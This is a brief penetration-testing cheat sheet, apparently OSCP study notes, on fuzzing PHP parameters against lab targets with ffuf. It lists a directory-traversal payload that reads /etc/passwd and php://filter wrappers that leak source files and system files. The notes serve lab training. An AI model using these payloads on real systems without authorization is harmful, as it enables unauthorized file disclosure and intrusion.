// notes/ Web Exploitation
🕸️
Php Applications
Fuzz php? parameters
#web applications#adot8
source · oscp.adot8.com · web-applications/php-applications ↗PHP Applications
Fuzz php? parameters
code
01ffuf -k -u https://streamio.htb/admin/index.php?FUZZ=id -w burp-parameter-names.txt ffuf -u http://192.168.156.209/manage.php?FUZZ=id -H "Cookie: PHPSESSID=i43gfdnnlackkpfp934p9hdh25" -w burp-parameter-names.txt
Fuzzing for DT and LFI
?FUZZ=../../../../../../../../etc/passwd
{% hint style="info" %} You can add cookies using -H and the cookie header from burp {% endhint %}
<pre><code><strong>php://filter/convert.base64-encode/resource=index.php </strong>php://filter/convert.base64-encode/resource=/etc/passwd </code></pre>